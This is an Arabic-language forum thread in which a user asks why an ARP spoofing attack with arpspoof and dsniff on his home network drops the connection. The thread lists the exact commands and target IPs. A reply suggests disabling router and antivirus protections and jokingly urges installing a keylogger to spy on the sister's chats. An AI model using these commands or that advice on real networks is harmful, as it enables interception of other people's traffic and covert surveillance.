• 0
FUNCTION

Arpspoof يقطع الاتصال ! على الجهاز المطلوب

سؤال

بسم الله الرحمن الرحيم..

اللهم صلي على محمد وآل محمد ...

انا تعجبني امور السكيورتي والامن وكذلك حماية الشبكه وحمايه نفسك من اي شيء .. طيب . اطيل عليكم..

تعرفون اداة الـ arpspoof وهي خاصة برسل رزم للشبكه بهدف تحويل البيانات إلى القيت وي حقك.. والخاصة فيك ..

ومن ثم التنصت عن طريق الـ dsniff

الي حاصل هو .. يوم كنت في الشركة واحنا قسم الاي تي.. قمت بجربه الـ اي اربيسبوف arpspoof والتنصت على جهاز آخر متصل بالشبكة .

وفعلا حصلت على بيانات وتحولت لي..

عندما ذهبت إلى البيت واحنا عندنا اتصال دي اس ال .. موديم من نوع Thomson جربت اتنصت على جهاز اختي ( بعلمها ) كذلك ولكن يقطع الاتصال بيني وبينها !

والبيانات هي كالتالي ..

192.168.1.254 --->>>> Gateway

192.168.1.69 ------>>> Target IP

طبعا استخدمت هذا الشيء نفس الي عملته سابقا ولكن يفصل الاوامر كالتالي

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -t 192.168.1.254 192.168.1.69

arpspoof -t 192.168.1.69 192.168.1.254

dsniff -i eth0

وعند تنفيذ الامر يبقى فقط ثلاث ثواني ثم يفصل الاتصال عني وكذلك عن اختي بالجهاز الاب توب .( وللعلم اتصالنا عن طريق الواير لس )

وهذاا مر الاف كونفق . ( للعلم انا استخدم اللنكس على الفرشوال مشين ) والانترنت صاير بـ Bridged

eth0 Link encap:Ethernet HWaddr 00:0c:29:8e:5b:3e

inet addr:192.168.1.137 Bcast:192.168.1.255 Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe8e:5b3e/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:70125 errors:0 dropped:0 overruns:0 frame:0

TX packets:56134 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:18681282 (18.6 MB) TX bytes:9201326 (9.2 MB)

Interrupt:19 Base address:0x2000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:139 errors:0 dropped:0 overruns:0 frame:0

TX packets:139 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:7384 (7.3 KB) TX bytes:7384 (7.3 KB)

[email protected]:~#

ممكن احد يوضح لي شنو سبب قطع الاتصال لما استخدم هذه الاداة ؟

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

4 إجابة على هذا السؤال .

  • 0

ههههه مافي رد كلش ؟؟ بالله وحتى كلمه مشكور بالمقلوب مافيه

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

1

بعض الموديلات في Thomson فيها inspection على الpackets وخواص لمنع dos.. و _ربما_ أيضا تقوم بـdynamic arp inspection لمنع عمليات الـspoofing...

لذا جرب تدخل الاعدادات ربما تحصل على شيء من خلاله تقوم بإيقاف خواص الأمان هذه. ليس لدي جهاز Thomson الآن لذا جرب وابحث لوحدك.. ربما في قسم الحائط الناري لأنه يحتوي على خاصية inspection..

2

نقطة أخرى... ربما برنامج مضاد الفيروسات أو أي برنامج للأمان، في جهازها قام بحظرك لأنك قمت بعملية مشبوهة... والعملية المشبوهة أنك أرسلت arp frame مع mac address مختلف لرقم IP موجود في الـtable... وارقام الـmac نادرا ما تتغير... لذا تأكد ان مضاد الفيروسات أو اي وسيلة حماية عندها أيضا disabled..

3

كذلك ايضا عاين الarp table لجهازها وجهازك، لتشاهد الـarp table، وسجل المخرجات كملاحظة، ثم تحقق من الـmac address الحقيقي للمنافذ

الذي يمكن أن يحصل أنه ربما عنوان الـmac خاطئ ولجهاز آخر.. الفائدة من هذه الخطوة، هو أنك ستتحقق فيما إذا كان arpspoof يعمل كما يجب أم لا.

شكلك ناوي تهكر على اختك :D مسكناك... لو يدري ابوك بس... نزل key logger وريح دماغك :D

arpspoof لن يعطيك الكلمات السرية.. معظمهم مشفرين، مثل msn / gmail غيره... :P لكن الجيد الحوارات مش مشفرة. تجسس عليها زين بالمسنجر ما اوصيك :D

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

:blush: هههههه

السلام عليكم .. يلبي قلبك ...

:lol: بصراحة افقه عليك في الحديث .. :ohmy:

انا بحاول اشوف الموديم واظن فيه شغلة اسمها بلوك Dos ربما هذي شغالة .. انا الان بالشغل ولذا بعيد عن البيت هههه :lol:

الشغلة الاخرى ... فعلا انا جبت جهاز اختي جنبي بالضبط .. ولما سويت ارسال حزم لاحظت الكاسبر علم بلوك للاي بي حقي ! ولما اسوي بنق ping يبين انه الجهاز غير موجود و يستجيب لي نهائيا .. :ph34r:

هل من طريقة في عدم قطع الاتصال .. ! لاني طفشت والله .. انا سمعت انه يمكن لازم اغير الماك ادرس حقي ؟ واذا فعلا ايوه كيف اغيره ¦.. باي طريقة . وللعلم ترى انا اعمل على نسخة فيرشوال مشين .7 VMware Workstation ولذا الاتصال صاير برج ... يعني ماظن فيه مشكلة ... ¦(*_*)¦

انا طبعا مابي اهكر على اختي ههههههههههههه بعلمها طبعا جالسين نسوي تجارب :P

فـ شنو الحل برأيكم .. ؟

:wub:

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

السلام عليكم ورحمة الله

بارك الله فيك

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

من فضلك سجل دخول لتتمكن من التعليق

ستتمكن من اضافه تعليقات بعد التسجيل



سجل دخولك الان

  • يستعرض القسم حالياً   0 members

    لا يوجد أعضاء مسجلين يشاهدون هذه الصفحة .